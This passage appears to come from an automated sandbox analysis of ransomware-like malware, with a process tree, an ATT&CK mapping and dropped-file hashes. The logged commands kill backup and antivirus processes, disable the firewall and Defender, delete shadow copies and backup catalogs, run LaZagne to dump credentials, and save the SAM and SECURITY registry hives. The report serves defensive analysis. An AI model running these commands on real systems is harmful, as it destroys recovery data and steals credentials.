- Kills process with taskkill
- Suspicious use of WriteProcessMemory
PID:4520
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Intuit.QuickBooks.FCS*3⤵
- Kills process with taskkill
PID:4868
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooBackup*3⤵
- Kills process with taskkill
PID:4004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooIT*3⤵
- Kills process with taskkill
PID:4972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM zhudongfangyu*3⤵
- Kills process with taskkill
PID:4268
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
- Kills process with taskkill
PID:4944
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM stc_raw_agent*3⤵
- Kills process with taskkill
PID:3556
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VSNAPVSS*3⤵
- Kills process with taskkill
PID:2848
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBCFMonitorService*3⤵
- Kills process with taskkill
PID:4108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamTransportSvc*3⤵
- Kills process with taskkill
PID:212
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamDeploymentService*3⤵
- Kills process with taskkill
PID:712
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamNFSSvc*3⤵
- Kills process with taskkill
PID:4928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
- Kills process with taskkill
PID:2052
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM PDVFSService*3⤵
- Kills process with taskkill
PID:2340
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecVSSProvider*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3800
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentAccelerator*3⤵
- Executes dropped EXE
- Kills process with taskkill
- Suspicious behavior: EnumeratesProcesses
PID:1856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecRPCService*3⤵
- Kills process with taskkill
PID:840
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcrSch2Svc*3⤵
- Kills process with taskkill
PID:3092
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcronisAgent*3⤵
- Kills process with taskkill
PID:3988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CASAD2DWebSvc*3⤵
- Kills process with taskkill
PID:2304
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CAARCUpdateSvc*3⤵
- Kills process with taskkill
PID:1840
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM TeamViewer*3⤵
- Kills process with taskkill
PID:4036
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe2⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:1796
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
PID:96
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set domainprofile state off3⤵
- Modifies Windows Firewall
PID:3584
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set privateprofile state off3⤵
- Modifies Windows Firewall
PID:840
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set publicprofile state off3⤵
- Modifies Windows Firewall
PID:2584
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4400
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:2144
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f3⤵
- Modifies registry key
PID:3064
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionExtension .exe3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4956
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3128
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3816
-
-
-
C:\Users\Admin\AppData\Roaming\pass.exe"C:\Users\Admin\AppData\Roaming\pass.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2680 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c cd %appdata% & laZagne.exe all -oA -output %appdata% & ren credentials*.txt pass.txt3⤵PID:1968
-
C:\Users\Admin\AppData\Roaming\LaZagne.exelaZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming4⤵
- Executes dropped EXE
PID:4904 -
C:\Users\Admin\AppData\Roaming\LaZagne.exelaZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming5⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:2704 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "reg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\qzziixfv"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1364 -
C:\Windows\system32\reg.exereg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\qzziixfv7⤵PID:884
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "reg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\erkcpundyf"6⤵PID:4880
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "reg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\irkjzq"6⤵PID:216
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c cd %appdata% & del /f credentials* & del /f pass.txt & del /f LaZagne.exe & del /f tool.bin3⤵PID:4592
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2144
-
-
-
-
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5016
-
-
C:\Users\Admin\AppData\Roaming\discord.exe"C:\Users\Admin\AppData\Roaming\discord.exe"2⤵PID:1856
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1920
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
C:\Windows\system32\reg.exereg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\erkcpundyf1⤵PID:600
-
C:\Windows\system32\reg.exereg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\irkjzq1⤵PID:4876
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log1⤵
- Opens file in notepad (likely ransom note)
PID:3568
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log1⤵
- Opens file in notepad (likely ransom note)
PID:828
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log1⤵
- Opens file in notepad (likely ransom note)
PID:4904
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3260 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0x84,0xd8,0x7ff9676c9758,0x7ff9676c9768,0x7ff9676c97782⤵PID:164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1804 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:82⤵PID:2712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2844 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:12⤵PID:4360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2836 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:12⤵PID:1796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2080 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:82⤵PID:2588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1532 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:22⤵PID:4672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4380 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:12⤵PID:3256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4564 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:82⤵PID:4916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4724 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:82⤵PID:4644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5020 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:82⤵PID:3904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4584 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:82⤵PID:4132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:82⤵PID:3548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:82⤵PID:4128
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:600
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:1820
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2244 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.0.126992754\1345456090" -parentBuildID 20221007134813 -prefsHandle 1712 -prefMapHandle 1688 -prefsLen 20936 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1749b90-4641-4be2-8938-9639c1a3f5c2} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 1792 256c9bd9a58 gpu3⤵PID:3732
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.1.1541991436\1506761253" -parentBuildID 20221007134813 -prefsHandle 2136 -prefMapHandle 2132 -prefsLen 21017 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ceafee2-8a37-4223-90dc-cbd7aaee7ad6} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 2148 256c9332658 socket3⤵PID:960
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.2.1459241840\1269587518" -childID 1 -isForBrowser -prefsHandle 3088 -prefMapHandle 3084 -prefsLen 21120 -prefMapSize 232675 -jsInitHandle 1036 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60353fa3-bc2d-4e41-bb5d-a448413cadd4} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 2780 256cd3f8e58 tab3⤵PID:2352
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.3.334813878\729906253" -childID 2 -isForBrowser -prefsHandle 3492 -prefMapHandle 3488 -prefsLen 26480 -prefMapSize 232675 -jsInitHandle 1036 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdec3432-9969-4119-ba84-c86c581629e4} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 3504 256ce676458 tab3⤵PID:2912
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.4.1056218112\495753192" -childID 3 -isForBrowser -prefsHandle 4284 -prefMapHandle 4216 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1036 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb052990-70ea-468a-90c0-4278cd69f397} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 4304 256cf6b6158 tab3⤵PID:1608
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.5.726332161\1275758279" -childID 4 -isForBrowser -prefsHandle 4788 -prefMapHandle 4784 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1036 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3bddc08-ff1f-4381-b9ab-82c5a65f1517} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 4792 256cc403858 tab3⤵PID:5456
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.7.1226247476\258293618" -childID 6 -isForBrowser -prefsHandle 5124 -prefMapHandle 5128 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1036 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {93a364de-9f79-4420-9496-f33e54f182d4} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 4808 256cc405f58 tab3⤵PID:5472
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.6.654536354\2105017117" -childID 5 -isForBrowser -prefsHandle 4928 -prefMapHandle 4932 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1036 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed6c5d82-54a6-4911-a3ce-ed5e32d21a72} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 4920 256cc405358 tab3⤵PID:5464
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Indicator Removal
2File Deletion
2Modify Registry
3Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
371B
MD53dcccc597b4800b47fc872700193cec7
SHA1035e59da6b7f629376f3716f0e0a1f3f5ea0de98
SHA2561d8c8ca1026165f9c0b0cc960638d2d95d87995aaddbd0067ae3facaac819ce9
SHA51236bfc45dfbcde5b3fb20ed517eb3ae9c19c533e0b86f66db7b3d8dd50c0a72a7593f237f51865a559e648405a80eda77ba1ba32d2dabab5cf151569917973802
-
Filesize
5KB
MD556a0a5b0cc111e3259e95ad8915f9f48
SHA113c40a230cdc4000881aec15f0c54415dedddf75
SHA2561ba7812b9deb8c38c3d6d7cf4bf2a80f3bcd1613fdaf53920f0825cc33499604
SHA51268b4300a9ab42e92df8dd84b9055c9128d31e0d13975b35d3ef88f9759ddda5196885f819b92b86b0763b406ba8b0034f19a601e7b7f9dafc437bc83a2c9c479
-
Filesize
5KB
MD5cce9da4e6b2825b2f07482691d388ab0
SHA1e0745924ff49a1de03f2833a7be6768ce3b66c47
SHA25670bd9a26fb8decfc37c99401c5f629aeebe3810b29084948e4398b6bcd05829a
SHA5125b0908ac01dd7b1f353e1f5ffe5a44030839835ea91013ea8eb29eb4fdf5956caf48c265911c06c64a2b73e75705404e24997ade27644796f1eb4b4fa4cbaf04
-
Filesize
204KB
MD592dc84b94060eae6b3bda4bf63cc40b6
SHA124a98baeba55f383625715dcd6a6331127801a7b
SHA25652682d1b39c2f23b6a1a0ed644c3e134a5c2789a5219bb97269a98ab9443c6de
SHA512ca2a2e11e3b495cd695dfe6441b68b8048c81acd35f0ed6ca10daec33edf0ae6671ff5e7799a3487a0c38fb601e007800f946a018d0447f38d401c84a126f880
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcf0uwfs.default-release\activity-stream.discovery_stream.json.tmp
Filesize21KB
MD56a419cf3f2fd22ac4290278494ed4dc9
SHA10c61ed30aae03a40aa15ddc3b552c592ae6ce56f
SHA2564fa581b8ccae0f330bbda07e62de1965313487c46b7a897cd7027a6bb9154c6b
SHA512fc8198e633b0b6e895d11b4419a0cec57cd3ffaa8605ab2724638381fa505e6e60513a15d450d0665fd7dab3080f532e69958c9d1673891907319d575baa73d5
-
Filesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
Filesize
12KB
MD5a1b78a3ce3165e90957880b8724d944f
SHA1a69f63cc211e671a08daad7a66ed0b05f8736cc7
SHA25684e071321e378054b6d3b56bbd66699e36554f637a44728b38b96a31199dfa69
SHA51215847386652cbee378d0ff6aad0a3fe0d0c6c7f1939f764f86c665f3493b4bccaf98d7a29259e94ed197285d9365b9d6e697b010aff3370cf857b8cb4106d7d8
-
Filesize
13KB
MD50dca79c062f2f800132cf1748a8e147f
SHA191f525b8ca0c0db245c4d3fa4073541826e8fb89
SHA2562a63e504c8aa4d291bbd8108f26eecde3dcd9bfba579ae80b777ff6dfec5e922
SHA512a820299fba1d0952a00db78b92fb7d68d77c427418388cc67e3a37dc87b1895d9ae416cac32b859d11d21a07a8f4cef3bd26ebb06cc39f04ad5e60f8692c659b
-
Filesize
14KB
MD5785f15dc9e505ed828356d978009ecce
SHA1830e683b0e539309ecf0f1ed2c7f73dda2011563
SHA256b2b68de1d7e5997eb0c8a44c9f2eb958de39b53db8d77a51a84f1d1b197b58b1
SHA51216033b72be6d66ab3a44b0480eb245d853a100d13a1e820eff5b12ce0bb73e17d6e48b3e778d1b20d0c04fe1fb8a5723c02ed8af434ae64d0944f847796d98f2
-
Filesize
10KB
MD5aec314222600ade3d96b6dc33af380a6
SHA1c6af3edadb09ea3a56048b57237c0a2dca33bee1
SHA256ea96505b38d27c085544fb129f2b0e00df5020d323d7853e6a6a8645ac785304
SHA512bbc00aa7fdf178bb6b2d86419c31967f2bc32d157aa7ee3ac308c28d8bf4823c1fafcde6c91651edc05c146e44d7e59e02a76283890652b27c52f509c3b9ef9a
-
Filesize
12KB
MD54ed6d4b1b100384d13f25dfa3737fb78
SHA1852a2f76c853db02e65512af35f5b4b4a2346abd
SHA256084e4b2da2180ad2a2e96e8804a6f2fc37bce6349eb8a5f6b182116b4d04bd82
SHA512276201a9bcb9f88f4bbac0cd9e3ea2da83e0fb4854b1a0dd63cff2af08af3883be34af6f06ece32fad2fd4271a0a09a3b576f1ed78b8a227d13c04a07eaf0827
-
Filesize
87KB
MD50e675d4a7a5b7ccd69013386793f68eb
SHA16e5821ddd8fea6681bda4448816f39984a33596b
SHA256bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1
SHA512cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66
-
Filesize
87KB
MD592075c2759ac8246953e6fa6323e43fe
SHA16818befe630c2656183ea7fe735db159804b7773
SHA256e7af6119b56ddd47fd0a909710f7163d7ef4822405fc138d24e6ce9de7a5022f
SHA5127f3a4409859695f53291c96dd487bca2649815bad5f4610c2c6f92777411d39210e293d962573a20dfe73ea15331de7e6c18b017ae1d6f226387eab1fc1f586c
-
Filesize
177KB
MD5daccb97b9214bb1366ed40ad583679a2
SHA189554e638b62be5f388c9bdd35d9daf53a240e0c
SHA256b714423d9cad42e67937531f2634001a870f8be2bf413eacfc9f73ef391a7915
SHA51299fd5c80372d878f722e4bcb1b8c8c737600961d3a9dffc3e8277e024aaac8648c64825820e20da1ab9ad9180501218c6d796af1905d8845d41c6dbb4c6ebab0
-
Filesize
131KB
MD52787764fe3056f37c79a3fc79e620172
SHA1a64d1a047ba644d0588dc4288b74925ed72e6ed4
SHA25641c593c960f3f89b1e1629c6b7bd6171fe306168f816bef02027332a263de117
SHA5121dc5bb470be558c643a3f68e23423697384bc547b1192cd398dff640e28f7df85563bc87643cdcde9b8b4f880f272e13a673a018ae251e100bd99790f993afa0
-
Filesize
38KB
MD57808b500fbfb17c968f10ee6d68461df
SHA12a8e54037e7d03d20244fefd8247cf218e1d668f
SHA256e2701f4e4a7556adab7415e448070289ba4fe047227f48c3a049d7c3154aff0b
SHA512b4239e792141bcf924f61bfd46033934337079b245f423b34820d36c6599ca35ab06bc525acfff4cafa75e31975fcd0409dedd203377d642fc5dc55ec2c1fa27
-
Filesize
251KB
MD5ab582419629183e1615b76fc5d2c7704
SHA1b78ee7e725a417bef50cca47590950e970eae200
SHA2565a45f7cd517ad396a042bc2767ae73221dc68f934e828a9433249924a371ee5e
SHA5123f38441dd0b88b486dafaa1e15d07f0ee467a362c1603071a2fa79de770fa061ced25ca790f0d3139f31178c719cc82ac88601262e2a0ca809708dfa3f6f76ca
-
Filesize
27KB
MD5a48af48dd880c11673469c1ade525558
SHA101e9bbcd7eccaa6d5033544e875c7c20f8812124
SHA256a98e9f330eeaf40ef516237ab5bc1efac1fc49ed321a128be78dd3fb8733e0a4
SHA512a535dadb79c1ca10506858226442d1d1fb00e5d6f99afa6b539e2506a6627a7bd624a7ee2bc61f55c974113de80fd7a95e6c18e9402736d32d5099077ca1b913
-
Filesize
74KB
MD510cd16bb63862536570c717ffc453da4
SHA1b3ef50d7ac4652b5c35f1d86a0130fb43dd5a669
SHA256e002a1bd6fba44681d557b64d439585dba9820226e1c3da5a62628bbaa930ae3
SHA51255ee581c4005901661efaf9aad6ea39b2b2e265579539d464d62e4209638567b3b9fdd945d0bed0a1047f977d374a5707a970c621ca289077e2d6c5aeca491b1
-
Filesize
84KB
MD5244d92824ef54b139ecd4f2b58a5d9d5
SHA1ff5696f6e3dc42e578a580299ac53d8c5e11d917
SHA256fd55c3e3b2863425050619b8d42fe19cf06c1c8e2e11f7076e1f4422663e6851
SHA51210fba938064bca2b9163d6c0d0a0361d0ebd896e32346cade3e4a439475c223ced59ac8f9c51727d5556149b14990ab62ee6769c35cf067aaac5d63dd5d4688f
-
Filesize
762KB
MD54dbdcd4c1d91ebb19d0520ad80f35d78
SHA11a2e0de2cb1c5be36d3e7ad691bf6b27436dbdb7
SHA256c74288cc76f67f9f3be2ce61b3c4b1df78b082f4d55dc4dd7b68f6a4803ea47e
SHA5128a298985628c895a67adf9538e92ff7527219163dc1c491f5c250bd36532d66f9d9530c04778d535535eeb0f22dcb4c55d22ab3459b6e827d614ca1e7c647031
-
Filesize
1KB
MD56fe7232e13f5f8307c037b54fe0dcc10
SHA1510075454d9179d1c6669df67f126213aabcb99f
SHA2564996109560a79774034a05b398d64b1b441c49f0f03682c4683554c59dd47e5c
SHA5128893febd884f6411025ff9df7d0ef2dbc756baa93903423e805b5e981273838567f2ea60d072d4d98fe9b2f2c25a85800522cebc5e832a3256d4c10605085725
-
Filesize
3.2MB
MD5bf83f8ad60cb9db462ce62c73208a30d
SHA1f1bc7dbc1e5b00426a51878719196d78981674c4
SHA256012866b68f458ec204b9bce067af8f4a488860774e7e17973c49e583b52b828d
SHA512ae1bdda1c174ddf4205ab19a25737fe523dca6a9a339030cd8a95674c243d0011121067c007be56def4eaeffc40cbdadfdcbd1e61df3404d6a3921d196dcd81e
-
Filesize
194KB
